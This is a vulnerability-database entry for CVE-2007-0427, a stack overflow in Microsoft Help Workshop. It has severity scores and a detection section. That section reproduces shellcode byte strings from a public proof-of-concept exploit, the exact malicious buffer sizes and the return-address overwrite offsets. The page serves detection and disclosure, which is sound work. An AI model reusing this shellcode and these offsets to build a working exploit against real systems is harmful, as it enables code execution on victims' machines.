cbcvebase.
CVE-2007-0427
published 2007-01-23

CVE-2007-0427: Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file…

PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.96%
98.0th percentile
Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file with a long HLP field in the OPTIONS section.

Affected

1 ranges
VendorProductVersion rangeFixed in
microsofthtml_help_workshop

Detection & IOCsextracted from sources · hover to see the quote

filename.cnt
filename.HPJ
command;Microsoft Help Workshop PoC exploit by porkythepig [OPTIONS] HLP=
bytes
66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 32 d2 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 32 d2 88 10 58 50 66 2d 11 05 48 40 8b d0 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
bytes
66 83 c4 10 8b c4 66 81 ec 10 21 50 66 2d 11 11 50 b8 7a 6b 3f 79 ff d0 58 50 80 38 20 74 49 5b 53 33 c0 b0 ff 50 66 81 eb 11 05 53 b8 23 2d 3f 79 3c ff 75 02 32 c0 ff d0 58 50 66 2d 11 05 32 db 38 18 74 03 40 eb f9 5b 53 b2 01 b1 5c 88 08 40 38 13 74 08 8a 0b 88 08 43 40 eb f4 b2 01 88 10 58 50 66 2d 11 05 48 40 8b d0 80 38 01 74 03 40 eb f8 32 c9 88 08 58 50 66 2d 11 11 50 33 c9 51 51 51 51 51 51 51 52 b8 10 50 3f 79 ff d0 33 c0 50 b8 da 69 3f 79 ff d0
bytes
e9 1b fe ff ff
  • Stack-based buffer overflow is triggered by a long HLP field value in the [OPTIONS] section of a .HPJ project file opened in Microsoft Help Workshop 4.03.0002
  • Exploit .cnt file payload begins with the ASCII string '0 Microsoft Help Workshop PoC exploit by porkythepig' followed immediately by shellcode; detect this pattern in .cnt files
  • Exploit .HPJ file payload begins with ';Microsoft Help Workshop PoC exploit by porkythepig' followed by [OPTIONS] and HLP= with embedded shellcode; detect oversized HLP= values in .HPJ files
  • The .cnt exploit buffer is exactly 619 bytes and the .HPJ exploit buffer is exactly 671 bytes; anomalously sized crafted files of these exact lengths targeting Help Workshop should be flagged
  • The .HPJ exploit buffer is exactly 671 bytes; anomalously sized crafted files of this exact length targeting Help Workshop should be flagged
  • Return address overwrite in .cnt exploit occurs at offset 0x210 (528 bytes) into the buffer; monitor for EIP control at this offset when parsing .cnt files
  • Return address overwrite in .HPJ exploit occurs at offset 0x14e (334 bytes) into the buffer; monitor for EIP control at this offset when parsing .HPJ files
  • ·The exploit provides five OS-specific API pointer sets (osApiPtrs); the JMP ESP gadget addresses and API addresses vary per OS version. Detection based on hardcoded return addresses will only cover the specific OS variants targeted by this PoC.
  • ·The vulnerability is described as 'user-assisted', meaning the victim must manually open a malicious .HPJ or .cnt file in Microsoft Help Workshop; exploitation requires social engineering.
  • ·Microsoft Help Workshop 4.03.0002 is described as a standard component of MS Visual Studio v6.0 and 2003 (.NET); affected systems are those with these Visual Studio versions installed.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.